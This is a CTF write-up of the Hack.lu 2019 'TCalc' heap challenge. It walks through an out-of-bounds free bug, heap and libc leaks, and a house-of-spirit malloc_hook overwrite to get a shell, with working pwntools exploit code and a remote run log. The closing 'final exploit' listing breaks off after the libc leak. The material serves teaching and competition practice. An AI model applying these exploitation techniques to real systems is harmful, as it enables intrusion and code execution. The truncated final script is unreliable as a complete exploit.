[hacklu19] TCalc Writeup | Fascinating Confusion

Fri 25 October 2019
ctf
Galile0
ctf writeup pwn exploit heap oob hacklu 2.30 house-of-spirit fastbin

TCalc was a pwnable challenge during the recent Hack.lu CTF 2019. It was worth 381 points and rated medium. Like most of the more difficult exploitation challenges, it was a heap challenge. Somewhat unusual was the use of libc version 2.30, which I haven't seen much in CTFs. The bug was a fascinating programming error resulting in an OOB array access that could be used for an arbitrary free. This write-up tries to describe not only the solution but also the pitfalls and things that didn't work.

We were given the source code, the Libc in use and of course the binary itself.

root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# checksec chall
[*] '/root/hax/MiscPwns/hacklu19/tcalc/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# ./ld-2.30.so ./libc.so.6
GNU C Library (GNU libc) stable release version 2.30.
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 9.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.archlinux.org/>.

As we can see, almost all protections are enabled (RELRO is only partial) and we have Libc version 2.30.

Setup

The distro I am using was still on Libc version 2.29. Therefore my dynamic interpreter (the ld.so file) is incompatible with the provided Libc. Running the program with LD_PRELOAD, or calling Libc directly, results in a segfault. But you can simply download a packaged version of the correct GLibc and use the matching dynamic interpreter as a wrapper when starting the binary. I will also use this trick further down when starting the binary from the exploit script.

Looking at the source of the binary reveals three basic functions:

Add numbers
Calculate average
Delete numbers

Let's go and find some bugs. Don't worry, you don't even have to leave your house for that.

Identify the Bug

For storing numbers the program uses a simple array of pointers which is stored on the heap. Each numbers array uses its first slot as a count. When adding numbers we are asked to specify the count of numbers we want to add, which means we can indirectly control the input for malloc. The other two operations (Average and Delete) are based on a user supplied index. Since the slots are cleared upon delete we don't have any UAF or Double Free. Also note that the program uses calloc, which means we won't be able to get any freed TCache chunk back and memory gets zeroed out before being returned. And we also can't use any index below 0 or above 10 because of the following check, which is in the delete as well as in the average function:

if(!(0 <= idx < ARR_LEN) || data[idx] == NULL){exit(0);}

Or can we?! Let's take a look at the function in our favorite disassembler:

Since the program has two conditions to check, we would expect two branches. But we only see one. It's easy to spot that something went wrong. But what exactly happened here?

This is a rather common mistake in different languages, where programmers write something that is human readable but interpreted differently by the compiler. Let's take a look at the condition !(0 <= idx < ARR_LEN). C evaluates it from left to right. So it starts with 0 <= idx, which yields 1 for all non-negative values of idx and 0 for negative ones. Then it actually does the following: 1 < ARR_LEN (or 0 < ARR_LEN). Both are always true. The programmer wanted to write 0 <= idx && idx < ARR_LEN to verify that the idx variable is within some defined boundary. Instead he basically added an always true condition, so the negated check never fires. The result is a pretty straightforward Out-Of-Bounds (OOB) free/print.
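To make the difference tangible, here is a minimal sketch that emulates the C evaluation order in Python (Python itself chains comparisons the mathematical way, so the intermediate 0/1 result is spelled out by hand). The value of ARR_LEN is an assumption for illustration and the function names are made up:

```python
ARR_LEN = 10  # assumed array length, not taken from the challenge source


def c_style_check(idx):
    """Emulate C's !(0 <= idx < ARR_LEN); True means the program would exit."""
    first = int(0 <= idx)        # C turns the first comparison into 0 or 1
    in_range = first < ARR_LEN   # 0 < 10 or 1 < 10, always true
    return not in_range


def intended_check(idx):
    """What the programmer meant: !(0 <= idx && idx < ARR_LEN)."""
    return not (0 <= idx and idx < ARR_LEN)


for idx in (-5, 0, 9, 10, 638):
    print(idx, c_style_check(idx), intended_check(idx))
```

The buggy variant never rejects an index, while the intended one rejects everything outside 0 to ARR_LEN-1.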

Possible attacks

Before starting to do anything, we should lay out some kind of plan and think about what attacks are even possible. We aren't size restricted in our allocations, so most heap attacks should be feasible. We can also use an arbitrary free to some extent. This means the most reasonable attack seems to be some kind of house of spirit. Our aim should be to corrupt the FD pointer of a freed Fastbin chunk, and finally get an allocation at malloc_hook. Since we can supply the argument to malloc we can just overwrite the malloc_hook with system and call it with the address of /bin/sh. Since we have no UAF we need to forge some heap pointers. This means we also need some leaks, notably of the heap and Libc addresses.

Exploit Skeleton

Let's just get a basic skeleton that will execute our exploit and give us some convenience functions.

#!/usr/bin/env python
from pwn import *
from binascii import hexlify
import sys, struct

#convenience Functions
s       = lambda data               :io.send(str(data))        #in case that data is a int
sa      = lambda delim,data         :io.sendafter(str(delim), str(data), timeout=context.timeout)
sl      = lambda data               :io.sendline(str(data))
sla     = lambda delim,data         :io.sendlineafter(str(delim), str(data), timeout=context.timeout)
rl      = lambda numb=4096          :io.recvline(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
irt     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))

# Exploit configs
remote_port = 31337
remote_libc = 'libc.so.6'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
binary_path = 'chall'
ld_path = 'ld-2.30.so'
remote_ip = '<INSERT REMOTE IP>'

@atexception.register
def handler():
    if sys.last_type in [EOFError, struct.error]:
        data = io.stream()
        if data:
            log.failure("Connection got closed, last data received:")
            log.failure(data)
        else:
            log.failure("Connection got closed, no data pending")

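def launch_gdb(breakpoints=None, cmds=None):
    if args.NOPTRACE:
        return
    # avoid mutable default arguments, they would persist between calls
    breakpoints = breakpoints or []
    cmds = list(cmds or [])
    log.info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        if binary.address == 0:
            log.warning("Setting relative Breakpoints but binary has not been rebased")
        # one list entry per breakpoint (+= with a string would add single characters)
        cmds.append('b *0x{:x}'.format(binary.address + b))
    gdb.attach(io, gdbscript='\n'.join(cmds))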

def add(nums, cnt=None):
    if not cnt:
        cnt = len(nums)
    sla(delim, 1)
    sla(delim, cnt)
    for num in nums:
        sl(num)
    if len(nums) < cnt:
        sl('a') # to break out of read

def show(idx):
    sla(delim, 2)
    sla(delim, idx)
    avg = rl().split('is: ')[1]
    return avg

def delete(idx):
    sla(delim, 3)
    sla(delim, idx)

if __name__ == '__main__':
    # context.timeout = 1
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target

    binary = ELF(binary_path)
    libc = None
    delim = '>'

    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(remote_ip, remote_port)
        libc = ELF(remote_libc, checksec=False)
    elif args.STAGING:
        io = process([ld_path, binary_path], env={'LD_PRELOAD': remote_libc})
        libc = ELF(remote_libc, checksec=False)
    else:
        io = binary.process()
        libc = ELF(local_libc, checksec=False)
    if not args.REMOTE:
        for m in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            if binary.path.split('/')[-1] in m:
                binary.address = int(m.split("-")[0],16)

    # Exploit Code goes here
    irt()

This script allows us to develop our exploit against the locally used Libc, against the Libc used by the challenge server but run locally (STAGING), or against the remote target (REMOTE). We can also set relative breakpoints and launch GDB from our script. Even if you don't use GEF or pwndbg, it will allow you to set relative breakpoints, since the script reads the PIE base from /proc and rebases the binary accordingly. Just call it with ./exploit.py STAGING, or without parameters to use your local Libc.

Getting some Leaks

About this section

This section describes how to acquire Heap and Libc leaks. If you just want to know how to get code execution you can skip this.

To be honest, this took me quite some time. The program stores the numbers array on the heap and does any access (average and delete) based on a user supplied index for that array. Getting a leak is obviously only possible through the average function, which takes an index, looks the pointer to the numbers array (also stored on the heap) up, and calculates the average of the values in that array where size is encoded in the first value. This means we can only leak data stored on the heap, and we also need a pointer to that data, which has to be stored on the heap as well. Since the first 8 bytes of the numbers array to be used by the average function are used as the count value we also can't just point to whatever we want. Let's see what doesn't work.

The TCache Fail

About this section

This section is a rather lengthy description of a wrong path I took while solving the challenge. This cost me around 3 hours. But I think it's important to show that not everything is as straightforward and clear as write-ups make it seem. If you are just interested in the solution, I recommend skipping this section.

My initial idea was to use the TCache mechanism for the leaks. When you free a chunk of TCache size (and the corresponding TCache bin has fewer than seven entries), your chunk gets populated with a pointer to the next free TCache chunk as well as a pointer to the TCache per_thread struct. This struct stores the count as well as a pointer to the most recently freed chunk (the head of the list) for each TCache bin. Since this struct is also stored on the heap, it holds a pointer to the first chunk of every TCache bin. This means we could theoretically use a negative index to read a value out of the per_thread struct, which points to a free TCache chunk, and get some heap values this way. Let's try it out by adding a number and deleting it again:

add([1])
delete(0)
launch_gdb()

Let's check what it looks like on the heap:

As we can see the per_thread_struct holds the TCache count (marked yellow), and a pointer to the first free TCache chunk (marked red) for each size-bin. Our numbers array is at offset 0x250, and currently empty since we just deleted the first entry again. And the free chunk that we created by deleting the first entry has its first value set to 0 (since there is no other free chunk to point to), and the second pointer goes to the per_thread_struct again.

Now we can point the get_average function to whatever address we want by using the OOB access, but wherever we point, there needs to be a pointer, and that pointer should point to a location that looks like a valid numbers array (so the first value, interpreted as the count, has to be reasonable). Looking at our memory, we could supply an index which gets resolved to the free chunk. This chunk has a pointer to the per_thread_struct, and the first 8 bytes of the per_thread_struct are the counts of the free TCache bins. This sounds pretty good since it means we can control it by allocating and freeing a specific number of chunks of the corresponding size. Also, there is a legit heap pointer further down, so summing up at least 8 values would leak us a heap pointer. Sadly, a TCache bin can only hold up to 7 free chunks, so with the first bin we can only fake count values from 0-7 (just missing our pointer in the average calculation). We could also use the next TCache bin size, which would result in a minimum count of 0x100. Since this value is interpreted as an integer, the function would try to read 0x100 8-byte values and sum them up. That's a lot of memory, but still alright, so let's try it out:

add([1,1,1])
delete(0)
print hexdump(show(527))

If you're wondering where the 527 comes from: (0x55555555a2d8-0x555555559260) / 8. We just need to calculate the offset between the first entry of the **numbers array and the address where our pointer to the per_thread_struct lives, divided by the pointer size. The struct itself will look like this:

0x555555559010: 0x0000000000000100  0x0000000000000000
0x555555559020: 0x0000000000000000  0x0000000000000000
[...]
0x555555559050: 0x0000000000000000  0x000055555555a2d0
0x555555559060: 0x0000000000000000  0x0000000000000000

Which means the average function will sum up 0x100 8-byte values starting from 0x555555559018. This means everything between 0x555555559018 and 0x555555559010+0x100*8=0x555555559810. The result given is: 366504545509.464844. Let's do some calculations and see if we can find our pointer:

>>> hex(int(366504545509.464844*0x100-0x61-0x01011-0x000000000a373235))
'0x55555555a2d0'

Looks good to me. If you wonder where the values I subtracted come from: those are just the other values (like chunk sizes) on the heap in the averaged memory area, most notably the scanf buffer. But luckily it is all user controlled.
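Both calculations from this attempt (the OOB index and undoing the average) follow the same pattern every time, so here is a small sketch of them as helpers. The function names are made up for illustration; the numbers are the ones from the local run above:

```python
def oob_index(array_addr, target_addr, slot_size=8):
    """Index that makes array[idx] land on target_addr (may be negative)."""
    delta = target_addr - array_addr
    if delta % slot_size:
        raise ValueError("target is not slot aligned")
    return delta // slot_size


def pointer_from_average(average, count, known_values):
    """Undo the averaging: total sum minus every value we already know."""
    return int(round(average * count)) - sum(known_values)


idx = oob_index(0x555555559260, 0x55555555a2d8)
ptr = pointer_from_average(366504545509.464844, 0x100,
                           [0x61, 0x1011, 0x0a373235])
print(idx, hex(ptr))  # 527 0x55555555a2d0
```

Rounding instead of truncating the product is a small safety margin against the printed average being cut off after six decimals.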

Now you may wonder where the fail comes in. Try launching the script with STAGING as an argument, and you will crash with SIGSEGV. But why? Well, some debugging will show that the per_thread_struct with the challenge Libc actually looks like this:

0x7ffff7fff000:     0x0000000000000000      0x0000000000000291
0x7ffff7fff010:     0x0000000000010000      0x0000000000000000 <- See this shit?
0x7ffff7fff020:     0x0000000000000000      0x0000000000000000
0x7ffff7fff030:     0x0000000000000000      0x0000000000000000

The struct takes up a lot more space and our count of freed TCache chunks moved one byte to the left. But why? Let's take a look at what changed in the per_thread_struct between libc-2.29 (my local version) and libc-2.30 (the version used by the challenge):

// From libc-2.29 malloc.c Line 2916
typedef struct tcache_perthread_struct
{
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

// From libc-2.30 malloc.c Line 2906
typedef struct tcache_perthread_struct
{
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

As you can see, for some reason (if you know more, let me know), the type of counts was changed from char (one byte) to uint16_t (two bytes). This means our "fake numbers count" can be either 0-7 or at least 0x10000. The first isn't enough by a long stretch, since the pointer we are interested in is now even further down (the counts take twice as much space). And the second is way bigger than the heap (remember, the count gets multiplied by 8). The program would try to read up to heap_base+0x10000*8, eventually touches unmapped memory, and therefore segfaults. This was quite frustrating, but nonetheless a lesson learned. On to a different approach then.
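The effect of the type change on the first 8 bytes of the struct can be reproduced without a debugger. The following is only a sketch of the memory layout using Python's struct module; first_qword is a made-up helper name, and TCACHE_MAX_BINS is 64 as in glibc:

```python
import struct

TCACHE_MAX_BINS = 64


def first_qword(count_format, bin_index, freed_chunks):
    """Pack the counts array and read its first 8 bytes as the fake count."""
    counts = [0] * TCACHE_MAX_BINS
    counts[bin_index] = freed_chunks
    raw = struct.pack("<%d%s" % (TCACHE_MAX_BINS, count_format), *counts)
    return struct.unpack_from("<Q", raw)[0]


# one freed chunk in the second TCache bin, as in the experiment above
old = first_qword("B", 1, 1)   # char counts, libc-2.29
new = first_qword("H", 1, 1)   # uint16_t counts, libc-2.30
print(hex(old), hex(new))      # 0x100 0x10000
print(hex(new * 8))            # bytes the average function would walk over
```

With the wider counters the smallest non-trivial fake count already spans 0x80000 bytes, which is more than a freshly initialized main heap usually covers (typically 0x21000 bytes).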

Actually getting the Heap-Leak

At this point, it always helps to actually get a good understanding of the problem that's blocking you. So let's do that:

We need to leak a heap address
We can only use the average function
For this we need to point it to a valid heap address stored on the heap itself
The first value of the numbers array is the count of values to average, so we have to have a reasonable value there
We can't use the values of a freed TCache chunk since the FD pointer of a free TCache chunk points to its data and not the header, therefore the count will always be screwed (either 0 or some pointer)
We also can't abuse the tcache_perthread_struct since we can't manipulate the count to be actually useful.

Alright, so let's see if there is something on this list that we can overcome. While going through it I noticed something: the FD pointer of a free TCache chunk points to the chunk data, and not the header. Well, that's uncommon, isn't it? A Fastbin doesn't do this! The FD pointer of a free Fastbin chunk points to the header of the next free Fastbin chunk! And if we correctly align the chunk before that (use a size that is a multiple of 8), the last 8 bytes of the previous chunk are right where the FD of a Fastbin points. This means that, using Fastbins, we can reliably set the value which will be interpreted as the count by the average function. Let's put that into code:

for _ in range(7): # Exhaust TCache
    add([1,1,1,1,1,1,1,1,1,1,1,16])
    delete(0)
    # Note: Cause of calloc we won't ever get a Tcache back
add([1],cnt=12) # Fastbin A
add([1],cnt=12) # Fastbin B
delete(0)
delete(1) # FD now points to Fastbin A

Important note

There is one thing that may not be obvious but will be very important down the line: we use 12 values for the TCache chunks as well as for the Fastbins. 12 was not chosen at random. It was chosen such that the data is placed in a Fastbin of size 0x70. When we overwrite the malloc_hook we will leverage a libc address placed right in front of it, and those always start with 0x7f. So we can only abuse a free 0x70 bin to pass the Fastbin size check in libc. With this in mind, we already operate within the correct chunk size.

Looking at the heap after this shows the following:

Marked in yellow is the last TCache chunk we added and freed in the loop. You can see it ends with 0x10, at address $heap+0x610. Next, in green, is Fastbin A, which is just there so Fastbin B, marked blue, can point somewhere. Now Fastbin B (again, in blue) is the interesting one. It has its FD pointer set to Fastbin A, but instead of pointing to the data (like our TCache chunks do) it points to the header, specifically to $heap+0x610. So if we now point our average function to 0x7ffff8000690 it will average 16 values starting from $heap+0x618, thus leaking the FD of Fastbin A.

Fastbin vs. Tcache

This was (for me) the most challenging part of this challenge: realizing a free Fastbin points to the chunk header, while a free TCache points to the chunk data. So simple, yet 3 hours lost. Oh well.

So what index do we give to average? The original numbers array is at 0x7ffff7fff2a0 and our target at 0x7ffff8000690. Dividing the difference by 8 gives 638, so this should work. And just for fun: since we will (again) get the average, let's anticipate the calculation to get the pointer out of our average. Looking at the heap we can guess that it's just: leak*16 - 0x71*2 - 0x1. This will leak the Fastbin address, which means we get the heap base address by subtracting 0x1610. So, let's add some code and test it:

# Get Heap address
leak = show(638)
heap_base = int(float(leak)*16 - 0x71*2 - 0x1) - 0x1610
log.success("Heap-Base @ {:08x}".format(heap_base))
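If you are worried that a floating point average could mangle the pointer: with a count of 16 the division is by a power of two, so nothing is lost as long as the sum stays below 2^53. A minimal offline sketch of the round trip, assuming the program prints the average in a printf("%f") style (that format, the slot order and the helper name are assumptions; the heap base is the one from the final log):

```python
def simulate_average(values):
    """Format the mean like a printf("%f") style output would (assumed format)."""
    return "%.6f" % (sum(values) / float(len(values)))


heap_base = 0x000055f72b9f3000      # value from the final log, used as test data
fastbin_ptr = heap_base + 0x1610    # the pointer we want to recover
# 16 averaged slots: the pointer, two 0x71 size fields, a stored 1, rest zero
slots = [fastbin_ptr, 0x71, 0x71, 0x1] + [0] * 12

leak = simulate_average(slots)
recovered = int(float(leak) * 16 - 0x71 * 2 - 0x1)
print(leak, hex(recovered - 0x1610))
```

The recovered value matches the original pointer exactly, which is why the plain int() conversion in the exploit is good enough here.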

Now, this worked like a charm! What a relief. From here on it should be smooth sailing. Right? ... RIGHT?!

Getting Libc-Leak

Since we know the heap base address now, we can write arbitrary addresses on the heap and call free or average on them. How to get a libc value on the heap? Well: add a chunk too big for a Fastbin or TCache and free it again. How to get the average of this? Just put a pointer to the free chunk somewhere and calculate the index as before. Easy enough:

add([1],cnt=0x410//8) # chunk too big for TCache and Fastbin
add([heap_base + 0x1610], cnt=12) # Reuse Fastbin B, write pointer to the big chunk
delete(0) # Free the big chunk (lands in the unsorted bin) to get libc pointers
leak = show(757)
libc_base = int((float(leak)*16 - 0x421) / 2 - 0x1c0a40)
malloc_hook = libc_base + 0x01c09d0
one_gadget = libc_base + 0xeafab #0xcd3aa, 0xcd3ad, 0xcd3b0, 0xeafab
system = libc_base + libc.symbols['system']
log.success("Libc-Base@ 0x{:016x}".format(libc_base))
log.success("mall-hook@ 0x{:016x}".format(malloc_hook))
log.success("one-gadge@ 0x{:016x}".format(one_gadget))

I'm just gonna assume you have seen enough offset calculations at this point, so I'm not gonna go into deeper detail why we add heap_base+0x1610 or average at index 757. As you can also see, I've already prepared the one_gadget. This was another fail since the stack just didn't line up for any of those gadgets to work. I left it in, just so you can again see what kind of fails you can encounter. We will instead use system. Which also has its traps, but let's tackle one problem at a time.

Code Execution

Alright, this section assumes you already have heap and libc addresses. So how do you get code execution? The easiest way is to overwrite either the free_hook or malloc_hook. My favorite is, as I said a few hours ago during the introduction, using the house of spirit. And since I've already carefully used Fastbins of size 0x70 for everything, let's go with that. But oh no! We have no direct use after free, so we can't straightforwardly overwrite the FD pointer of a free Fastbin chunk. But we can free whatever we want! That's just as good.

Overwriting Malloc-hook

First, let's craft something we can then call free on. The idea is that we set up a fake chunk inside of an actual numbers chunk. We then free the fake chunk. It will get placed in the Fastbin list and its FD pointer gets populated. Then we free the actual numbers chunk that we used to create the fake chunk. Creating a new numbers array of the same size now allows us to overwrite the values of our free fake chunk, thus overwriting FD. Confusing? Yeah, for me too. But let's just step through:

add([heap_base+0x1640,0,0x71,0,0],cnt=12) # craft fake chunk and pointer to it
add([0x21,0x21,0x21,0x21]) # to fulfill nextsize

Now, the last one is important. There is a check in Libc that verifies that a valid size comes after the chunk we try to free. Since I was too lazy to count where I have to put this, I just sprayed a little. Nobody's perfect, right? Let's see how it looks on the heap:

I've tried to mark it as well as possible. In blue is the first chunk, with its first number set to point to the fake chunk, which starts at the 3rd value and is marked yellow. The blue chunk actually continues, I was just too lazy to mark it that way. The yellow chunk is completely fake and made by us. Next comes the green chunk, which is just there to satisfy the nextsize check of Libc when calling free. We can ignore that. What we've effectively done is to create overlapping chunks. Freeing the yellow chunk and then freeing and reallocating the blue chunk gives us the possibility to overwrite the FD pointer of the yellow chunk. Phew, confusing, let's see:

delete(625) # Free embedded Fake Fastbin 0x70 size
delete(0) # Free surrounding bin
add([0,0,0x71,malloc_hook-35],cnt=12) # Allocate surrounding chunk overwriting fd of fake Fastbin
add([],cnt=12)# Allocate 0x70 bin (use Fastbin)

You may be wondering why we use malloc_hook-35 to overwrite FD. The memory around malloc_hook looks like this:

0x7ffff7fc09c0 <__memalign_hook>:   0x00007ffff7e8b400      0x00007ffff7e8ba90
0x7ffff7fc09d0 <__malloc_hook>:     0x0000000000000000      0x0000000000000000

By using this offset we allocate at the following address:

0x7ffff7fc09ad:     0xfff7fc1dc0000000      0x000000000000007f
0x7ffff7fc09bd:     0xfff7e8b400000000      0xfff7e8ba9000007f
0x7ffff7fc09cd:     0x000000000000007f      0x0000000000000000

As you can see, the size field is set up perfectly with 0x7f: the low bits are only flags (including the inuse bit, the LSB of the size field), and the rest falls within the range of the 0x70 bin. Alright, our next allocation will be at malloc_hook! And we want to write system there. Just one (alright, maybe two) challenges left.
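Why 0x7f passes as a 0x70 chunk can be checked with the bin index formula glibc uses on 64-bit, (size >> 4) - 2. The sketch below rebuilds the bytes from the dump above as aligned 8-byte words starting at 0x7ffff7fc09b0 and reads the size field of the fake chunk; it only illustrates the arithmetic and does not touch a real process:

```python
import struct


def fastbin_index(size):
    """64-bit glibc: fastbin_index(sz) = (sz >> 4) - 2."""
    return (size >> 4) - 2


# Aligned view of the dump above, starting at 0x7ffff7fc09b0
base = 0x7ffff7fc09b0
memory = struct.pack("<6Q", 0x00007ffff7fc1dc0, 0, 0x00007ffff7e8b400,
                     0x00007ffff7e8ba90, 0, 0)
malloc_hook = 0x7ffff7fc09d0

fake_chunk = malloc_hook - 35
# the size field sits 8 bytes into the chunk header
size_field = struct.unpack_from("<Q", memory, fake_chunk + 8 - base)[0]
# user data starts 16 bytes into the chunk
hook_offset_in_data = malloc_hook - (fake_chunk + 16)

print(hex(size_field), fastbin_index(size_field), fastbin_index(0x70))
print(hook_offset_in_data)
```

Both sizes map to the same bin index, and malloc_hook ends up 19 bytes into the returned user data, which is the reason for the unaligned write in the next step.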

Writing system at malloc_hook

We can only write integers, i.e. 8 Byte values. And since we are not aligned with the malloc_hook anymore we have to be careful what we write.

system_low    = system & 0x000000FFFFFFFFFF
system_high   = system & 0xFFFFFF0000000000
add([0,system_low<<3*8,system_high>>5*8],cnt=12)

Now, this may look funny, but it is actually pretty logical. malloc_hook starts 3 bytes into one of our 8-byte slots, so we have to split the value into a low and a high part and shift each one to the correct place: the lower 5 bytes are shifted left by 3 bytes, the upper 3 bytes are shifted right by 5 bytes. Just play around with the memory layout or write it out on paper (that's what I did after like an hour of failing) to get a better grasp.
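Instead of paper you can also let Python do the bookkeeping. This sketch packs the values the way they would end up in the allocation and reads back the 8 bytes at the malloc_hook offset. The system address is a hypothetical example, split_unaligned is a made-up helper, and the layout (count first, then the numbers) is an assumption based on the description of the numbers array above:

```python
import struct

MASK64 = (1 << 64) - 1


def split_unaligned(value):
    """Split a 64-bit value so it starts 3 bytes into one slot and spills into the next."""
    low = value & 0x000000FFFFFFFFFF     # lower 5 bytes
    high = value & 0xFFFFFF0000000000    # upper 3 bytes
    return (low << 3 * 8) & MASK64, high >> 5 * 8


system = 0x00007f361b12e4e0  # hypothetical address, for illustration only
first, second = split_unaligned(system)

# Assumed layout of the user data at malloc_hook-19: count, nums[0], nums[1], nums[2]
data = struct.pack("<4Q", 12, 0, first, second)
written = struct.unpack_from("<Q", data, 19)[0]
print(hex(first), hex(second), hex(written))
```

Reading back at offset 19 yields the original address again, which confirms the shift amounts.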

Not a good idea

This method has one disadvantage: in some cases the shifted value overflows. To be precise, this happens if the second most significant byte of the address (the one right below the leading 0x7f) is larger than 0x7f, because then the shifted low part no longer fits into a signed 64-bit integer. In this case your malloc_hook will end up as 0x00007f7fffffffff. But you can just run the exploit again. There is probably a smarter way of getting the value aligned right. But sometimes a workaround is good enough.

Calling system

There is one last thing left: actually calling system. Now, the malloc hook just gets the argument of the malloc call passed. And our goal is of course to supply a pointer to '/bin/sh' or similar. But there is one problem: we have no arbitrary control over the malloced size. We can only specify the amount of numbers we want to store, so the value we give is multiplied by 8 before it reaches malloc. This means our /bin/sh address has to be divisible by 8, such that we can supply (sh/8), which results in a malloc with a size that expands to the original sh pointer. But since this string is referenced more than once in Libc, we should get lucky and find one, right?

for addr in list(libc.search("sh\x00")):
    if addr % 8==0:
        sh = libc_base + addr
        break
sh_count = sh//8 - 1
log.info("Adding a new list with count: {} | sh @ 0x{:016x}".format(sh_count, sh))
add([],cnt=sh_count)
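The count arithmetic can be checked offline as well. This is a sketch under the assumption that the program requests (count + 1) * 8 bytes, one extra slot for the stored count, which is what the sh/8 - 1 above suggests; both helper names are made up, and the unaligned candidate address is invented to show the filtering:

```python
def count_for_malloc_arg(target):
    """Count to enter so that the allocation request equals target.

    Assumes the program requests (count + 1) * 8 bytes.
    """
    if target % 8:
        raise ValueError("target must be 8-byte aligned")
    return target // 8 - 1


def first_aligned(candidates, alignment=8):
    """Return the first candidate address with the required alignment, or None."""
    for addr in candidates:
        if addr % alignment == 0:
            return addr
    return None


# the first entry is a made-up unaligned hit, the second is the address from the log
sh = first_aligned([0x7f361b0f5311, 0x7f361b0f5318])
print(hex(sh), count_for_malloc_arg(sh))
```

For the address from the final run this gives 17483794868834, the same count the exploit prints in its log.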

Getting the flag

And just as a proof:

root@Hydrogen:~/hax/MiscPwns/hacklu19/tcalc# ./exploit.py REMOTE
[*] '/root/hax/MiscPwns/hacklu19/tcalc/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to tcalc.forfuture.fluxfingers.net on port 1337: Done
[+] Heap-Base@ 0x000055f72b9f3000
[+] Libc-Base@ 0x    7f361b0df000
[+] mall-hook@ 0x    7f361b29f9d0
[+] one-gadge@ 0x    7f361b1c9fab
[*] Adding a new list with count: 17483794868834 | sh @ 0x00007f361b0f5318
[*] Switching to interactive mode
uid=1000(chall) gid=1000(chall) groups=1000(chall)
$ cat flag.txt
flag{easy_f0r_thee:_arb1trary_fre3}$ echo 'yay'
yay

And for easy copy/paste, the final exploit:

#!/usr/bin/env python
from pwn import *
from binascii import hexlify
import sys, struct

#convenience Functions
s       = lambda data               :io.send(str(data))        #in case that data is a int
sa      = lambda delim,data         :io.sendafter(str(delim), str(data), timeout=context.timeout)
sl      = lambda data               :io.sendline(str(data))
sla     = lambda delim,data         :io.sendlineafter(str(delim), str(data), timeout=context.timeout)
rl      = lambda numb=4096          :io.recvline(numb)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
irt     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))

# Exploit configs
remote_port = 1337
remote_libc = '/root/hax/MiscPwns/hacklu19/tcalc/libc.so.6'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
binary_path = '/root/hax/MiscPwns/hacklu19/tcalc/chall'
ld_path = '/root/hax/MiscPwns/hacklu19/tcalc/ld-2.30.so'
remote_ip = 'tcalc.forfuture.fluxfingers.net'

@atexception.register
def handler():
    if sys.last_type in [EOFError, struct.error]:
        data = io.stream()
        if data:
            log.failure("Connection got closed, last data received:")
            log.failure(data)
        else:
            log.failure("Connection got closed, no data pending")

def launch_gdb(breakpoints=None, cmds=None):
    if args.NOPTRACE:
        return
    # avoid mutable default arguments, they would persist between calls
    breakpoints = breakpoints or []
    cmds = list(cmds or [])
    context.terminal = ['tilix', '-a', 'session-add-right', '-e']
    log.info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    # cmds.append('set follow-fork-mode child')
    for b in breakpoints:
        if binary.address == 0:
            log.warning("Setting relative Breakpoints but binary has not been rebased")
        # one list entry per breakpoint (+= with a string would add single characters)
        cmds.append('b *0x{:x}'.format(binary.address + b))
    gdb.attach(io, gdbscript='\n'.join(cmds))

def add(nums, cnt=None):
    if not cnt:
        cnt = len(nums)
    sla(delim, 1)
    sla(delim, cnt)
    for num in nums:
        sl(num)
    if len(nums) < cnt:
        sl('a') # to break out of read

def show(idx):
    sla(delim, 2)
    sla(delim, idx)
    avg = rl().split('is: ')[1]
    return avg

def delete(idx):
    sla(delim, 3)
    sla(delim, idx)

if __name__ == '__main__':
    # context.timeout = 1
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target

    binary = ELF(binary_path)
    libc = None
    delim = '>'

    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(remote_ip, remote_port)
        libc = ELF(remote_libc, checksec=False)
    elif args.STAGING:
        io = process([ld_path, binary_path], env={'LD_PRELOAD': remote_libc})
        libc = ELF(remote_libc, checksec=False)
    else:
        io = binary.process()
        libc = ELF(local_libc, checksec=False)
    if not args.REMOTE:
        for m in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            if binary.path.split('/')[-1] in m:
                binary.address = int(m.split("-")[0],16)

    for _ in range(7): # Exhaust TCache
        add([1,1,1,1,1,1,1,1,1,1,1,16])
        delete(0)
        # Note: Cause of calloc we won't ever get a Tcache back

    # Prepare Heap Leak
    add([1],cnt=12) # Fastbin A
    add([1],cnt=12) # Fastbin B
    delete(0)
    delete(1) # FD now points to Fastbin A

    # Get Heap address
    leak = show(638)
    heap_base = int(float(leak)*16 - 0x71*2 - 0x1) - 0x1610
    log.success("Heap-Base @ {:08x}".format(heap_base))

    # Leak libc addresses
    add([1],cnt=0x410//8) # chunk too big for TCache and Fastbin
    add([heap_base + 0x1610], cnt=12) # Reuse Fastbin B, write pointer to the big chunk
    delete(0) # Free the big chunk (lands in the unsorted bin) to get libc pointers
    leak = show(757)
    libc_base = int((float(leak)*16 - 0x421) / 2 - 0x1c0a40)
